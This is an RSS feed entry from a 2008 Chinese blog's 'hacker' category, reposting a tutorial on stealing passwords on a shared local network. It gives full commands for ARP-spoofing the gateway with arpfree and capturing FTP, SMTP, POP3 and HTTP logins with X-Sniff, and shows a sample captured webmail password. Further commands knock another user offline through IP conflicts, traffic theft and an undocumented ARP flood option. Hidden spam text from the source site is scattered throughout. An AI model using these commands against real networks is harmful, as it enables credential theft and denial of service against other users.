﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>BlogJava-天若有情-文章分类-hacker</title><link>http://www.blogjava.net/jzgl-ever/category/34611.html</link><description>到教堂忏悔，愿主安抚我罪恶的心灵......</description><language>zh-cn</language><lastBuildDate>Sat, 13 Sep 2008 21:28:42 GMT</lastBuildDate><pubDate>Sat, 13 Sep 2008 21:28:42 GMT</pubDate><ttl>60</ttl><item><title>arpfree + xsniff嗅探局域网密码</title><link>http://www.blogjava.net/jzgl-ever/articles/228768.html</link><dc:creator>freedoom</dc:creator><author>freedoom</author><pubDate>Sat, 13 Sep 2008 11:07:00 GMT</pubDate><guid>http://www.blogjava.net/jzgl-ever/articles/228768.html</guid><description><![CDATA[<h1 class="xspace-title">arpfree + xsniff嗅探局域网密码</h1>
试验环境：<br />
&nbsp;&nbsp;&nbsp;一台八口共享上网路由器，接八台电脑 ！在其中一台机器上嗅探密码<span style="display: none">Netexpert网络分析专家个人空间</span><br />
<br />
步骤如下：<span style="display: none">Netexpert网络分析专家个人空间 LE MB&amp;kr0`</span><br />
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;1，首先ping 192.168.0.1 网关，然后用arp -a 获得网关Mac地址 0000ea0123de<span style="display: none">Netexpert网络分析专家个人空间</span><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2，使用arpfree欺骗网关，让它将其他机器发向网关的包发给嗅探主机<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;命令如下：<span style="display: none">Netexpert网络分析专家个人空间pgR4K wO,tG/H</span><br />
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;arpfree 0000ea0123de 123412341234 request 1.1.1.1&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;3，启动sniff开始嗅探<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 命令如下：&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp; xsniff -pass -hide -log pass.log&nbsp;<span style="display: none"><br />
</span><br />
&nbsp;&nbsp;&nbsp;4，打开pass.log就能察看嗅探到的密码！<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;示例：&nbsp;<br />
&nbsp;&nbsp;&nbsp;TCP&nbsp;&nbsp;[05/10/06 22:17:40]<br />
192.168.0.8-&gt;202.108.9.77 Port: 1158-&gt;80<br />
&nbsp;&nbsp;&nbsp;&nbsp;HOST: mail.163.com USER: 1111111, PASS: 1111111<br />
<table style="table-layout: fixed; word-break: break-all" cellspacing="1" cellpadding="3" width="98%" bgcolor="#fcfcfc" border="0">
    <tbody>
        <tr bgcolor="#f8f8f8">
            <td><span style="font-size: 10pt"><strong>Arpfree&nbsp;+&nbsp;X-Sniff嗅探局域网密码</strong><br />
            </span>游泳的鱼 发表于 2008-1-14 15:48:00 </td>
        </tr>
        <tr bgcolor="#ffffff">
            <td height="0">
            <table cellspacing="0" cellpadding="0" width="100%" border="0">
                <tbody>
                    <tr>
                        <td>&nbsp; <span id="ob_logd2029504">
                        <div class="digg_list" style="display: inline; background: url(/Images/digg.gif) no-repeat left top; float: right; margin: 0px 10px 5px 0px; width: 45px; height: 55px; text-align: center">
                        <div class="digg_number" style="padding-right: 0px; padding-left: 0px; font-weight: 600; font-size: 18px; padding-bottom: 11px; width: 45px; color: #333; line-height: 1; padding-top: 10px; font-family: tahoma,Arial,Helvetica,sans-serif">0</div>
                        <div class="digg_submit" style="padding-right: 0px; padding-left: 6px; padding-bottom: 0px; line-height: 1; padding-top: 3px; letter-spacing: 6px"><a style="font-size: 12px; line-height: 1" onclick="diggit(2029504);" href="javascript:void(null)">推荐</a></div>
                        </div>
                        </span>
                        <div class="tpc_content" id="read_tpc">ARP简介：<br />
                        <br />
                        要使用ARP欺骗，必须启动ip路由功能，修改(添加)注册表选项：<br />
                        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1<br />
                        <br />
                        发送ARP报文的软件，可以发送任意 源，目的 地址的ARP报文，可以结合Sniffer做不少的事~不用老在Sniffer里做ARP包了~<br />
                        <br />
                        不过要安装WinPacp 3.0驱动先...<br />
                        <br />
                        发送的时候可以选择ARP的TYPE。如果是ARP请求报文，则只要输入要访问的IP地址。<br />
                        <br />
                        如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址<br />
                        <br />
                        最后的发送速度可选参数为：（大小写敏感..我觉得挺不好的）<br />
                        <br />
                        fast---------最快<br />
                        hear---------每60ms一个包（可能是比较适合结合Sniffer做监听）<br />
                        slowhear-----每500ms一个包<br />
                        auto---------每1秒一个包<br />
                        slow---------每2秒个包<br />
                        <br />
                        使用方法如下：<br />
                        <br />
                        ***********************************************************************<br />
                        (1)Send arp packet in "request mode"&nbsp; Examples:　　　　　　　　　　　<br />
                        　　arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast　　　　　 <br />
                        　　　　　　　　　|　　　　　　|　　　　　|　　　|　　|　　　　　　<br />
                        　　　　　　你的网卡地址　 　　|　　　　　|　　　|　　|　　　　　　<br />
                        　　　　　　　　　　　　　对方网卡地址　&nbsp; |　　　|　速度　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　arp方式&nbsp; 　|　　　　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　　　　　&nbsp; |　　　　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　　　　你的IP地址　　　　　　　<br />
                        ***********************************************************************<br />
                        (2)Send arp packet in "reply mode"&nbsp; Examples:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
                        &nbsp; &nbsp; arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto&nbsp; &nbsp; <br />
                        　　　　　　　　|　　　　　　|　　　　|　　　|　　　|　　|　　　　　　<br />
                        　　　　　你的网卡地址　 　　|　　　　|　　　|　　　|　　|　　　　　　<br />
                        　　　　　　　　　　　　对方网卡地址&nbsp; |　　　|　　　|　 速度　　　　　<br />
                        　　　　　　　　　　　　　　　　　arp方式&nbsp; 　|　　　|　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　　　&nbsp; |　　　|　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　　你的IP地址&nbsp; |　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　　　　　　　 |&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />
                        　　　　　　　　　　　　　　　　　　　　　　　&nbsp; 对方IP地址&nbsp; &nbsp; &nbsp; &nbsp; <br />
                        ***********************************************************************<br />
                        <br />
                        <br />
                        反击&#8220;Lan终结者&#8221;的办法：<br />
                        <br />
                        1：发动比他更强烈的攻击：<br />
                        <br />
                        arpfree 0050fc272b26 ffffffffffff request 1.1.1.1 fast　　　　　 <br />
                        　　　　　　　|　　　 　|　　　　|　　　|　　|　　　　　　<br />
                        　　　　你的网卡地址　&nbsp; |　　　　|　　　|　　|　　　　　　<br />
                        　　　　　　　　　对方网卡地址　|　　　|　速度　　　　　<br />
                        　　　　　　　　　　　　　　arp方式　　|　　　　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　 |　　　　　　　　　<br />
                        　　　　　　　　　　　　　　　　　你的IP地址　　　　　　　<br />
                        2：交换机竞争：<br />
                        arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast<br />
                        　　　　　　　|　　　　　　|　　　　　|　　　|　　　|　　　　　　<br />
                        　　　　你的网卡地址　 　　|　　　　　|　　　|　　　|　　　　　　<br />
                        　　　　　　　你想攻击的人的网卡地址&nbsp; |　　　|　　 速度　　　　　<br />
                        　　　　　　　　　　　　　　　　arp方式　&nbsp; 　|　　　　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　　　&nbsp; |　　　　　　　　　<br />
                        　　　　　　　　　　　　　　　　　　　你的IP地址　　　　　　　<br />
                        <br />
                        方法1将导致他IP地址冲突（比&#8220;终结者&#8221;来的猛烈多了）<br />
                        <br />
                        方法2将使得他无法连接网络（由于交换机把他的流量都给你了）<br />
                        <br />
                        ***********************************************************************<br />
                        <br />
                        因为有朋友反映在非交换环境下，如使用HUB的情况下，无法对目标进行打击<br />
                        <br />
                        故增加参数&#8220;bomb&#8221;，使用方法如下：<br />
                        <br />
                        假设目标为IP：192.168.237.109 目标mac为：011a8575a436<br />
                        <br />
                        攻击命令如下：<br />
                        <br />
                        arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb <br />
                        <br />
                        其实就是进行简单的ARP DOS攻击，快速刷新目标的ARP缓存，可以在消耗自身较少系统资源的情况下<br />
                        <br />
                        造成和PDOS工具类似的效果，并且如果你不停止攻击，对方重启以后也无法正常进入系统<br />
                        <br />
                        （当然前提是他没拔网线）。<br />
                        <br />
                        其实这样做是十分不厚道的....所以参数就没有写在程序的 HELP 里面，大家慎用...<br />
                        <br />
                        <br />
                        =========================================================================<br />
                        <br />
                        X-Sniff嗅探器 <br />
                        <br />
                        可捕获局域网内FTP/SMTP/POP3/HTTP协议密码<br />
                        <br />
                        参数说明&nbsp; <br />
                        -tcp 输出TCP数据报&nbsp; <br />
                        -udp 输出UDP数据报&nbsp; <br />
                        -icmp 输出ICMP数据报&nbsp; <br />
                        -pass 过滤密码信息&nbsp; <br />
                        -hide 后台运行&nbsp; <br />
                        -host 解析主机名&nbsp; <br />
                        -addr IP地址 过滤IP地址&nbsp; <br />
                        -port 端口 过滤端口&nbsp; <br />
                        -log 文件名 将输出保存到文件&nbsp; <br />
                        -asc 以ASCII形式输出&nbsp; <br />
                        -hex 以16进制形式输出&nbsp; <br />
                        用法示例&nbsp; <br />
                        xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中&nbsp; <br />
                        xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出.<br />
                        <br />
                        <br />
                        ==========================================================================<br />
                        <br />
                        实验开始...<br />
                        <br />
                        试验环境：<br />
                        <br />
                        &nbsp; &nbsp; 一台八口共享上网路由器，接八台电脑，在其中一台机器上嗅探密码<br />
                        <br />
                        步骤如下：<br />
                        <br />
                        &nbsp; &nbsp; 1.首先ping 192.168.0.1 网关，然后用arp -a 获得网关Mac地址 0000ea0123de<br />
                        &nbsp; &nbsp; 2.使用arpfree欺骗网关，让它将其他机器发向网关的包发给嗅探主机&nbsp; 命令如下：<br />
                        &nbsp; &nbsp; &nbsp; arpfree 0000ea0123de 123412341234 request 1.1.1.1 hear<br />
                        &nbsp; &nbsp; 3.启动X-Sniff开始嗅探&nbsp; 命令如下：<br />
                        &nbsp; &nbsp; &nbsp; xsniff -pass -hide -log pass.log<br />
                        &nbsp; &nbsp; 4.打开pass.log就能察看嗅探到的密码！<br />
                        <br />
                        示例：<br />
                        &nbsp; &nbsp; TCP&nbsp; [05/10/06 22:17:40]<br />
                        &nbsp; &nbsp; 192.168.0.8-&gt;202.108.9.77 Port: 1158-&gt;80<br />
                        &nbsp; &nbsp; HOST: mail.163.com USER: 1111111, PASS: 1111111</div>
                        </td>
                    </tr>
                </tbody>
            </table>
            </td>
        </tr>
    </tbody>
</table>
<br />
如果是非交换环境，可省略1，2步。<br />
<br />
<strong>面提到的xsniff.exe 十分小巧，但是功能强大，呵呵呵！<br />
<span style="display: none">0</span>使用说明 请看下面的</strong><br />
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码<br />
参数说明&nbsp;&nbsp;<br />
<span style="display: none"><br />
</span>输出TCP数据报&nbsp;&nbsp;<br />
-udp 输出UDP数据报&nbsp;&nbsp;<br />
-icmp 输出ICMP数据报&nbsp;&nbsp;<br />
-pass 过滤密码信息&nbsp;&nbsp;<br />
-hide 后台运行&nbsp;&nbsp;<br />
-host 解析主机名&nbsp;<br />
-addr IP地址 过滤IP地址&nbsp;&nbsp;<br />
-port 端口 过滤端口&nbsp;&nbsp;<br />
-log 文件名 将输出保存到文件&nbsp;&nbsp;<br />
-asc 以ASCII形式输出&nbsp;&nbsp;<br />
-hex 以16进制形式输出&nbsp;&nbsp;<span style="display: none">Netexpert网络分析专家个人空间!E x"vM/LEu</span><br />
用法示例&nbsp;&nbsp;<br />
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中&nbsp;&nbsp;<br />
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出.<br />
<strong>上面提到的arpfree工具使用说明请看</strong> url]http://www.netexpert.cn/viewthread.php?tid=550[/url]<span style="display: none">Netexpert网络分析专家个人空间Zw+^9GqCZ</span><br />
<span style="display: none">Netexpert网络分析专家个人空间0K:Tz#@O)A0cc</span><br />
[<em> 本帖最后由 diker 于 2006-5-11 12:14 编辑 </em>]<span style="display: none">Netexpert网络分析专家个人空间t,[$BWSmu:Y</span><br />
<img src ="http://www.blogjava.net/jzgl-ever/aggbug/228768.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/jzgl-ever/" target="_blank">freedoom</a> 2008-09-13 19:07 <a href="http://www.blogjava.net/jzgl-ever/articles/228768.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>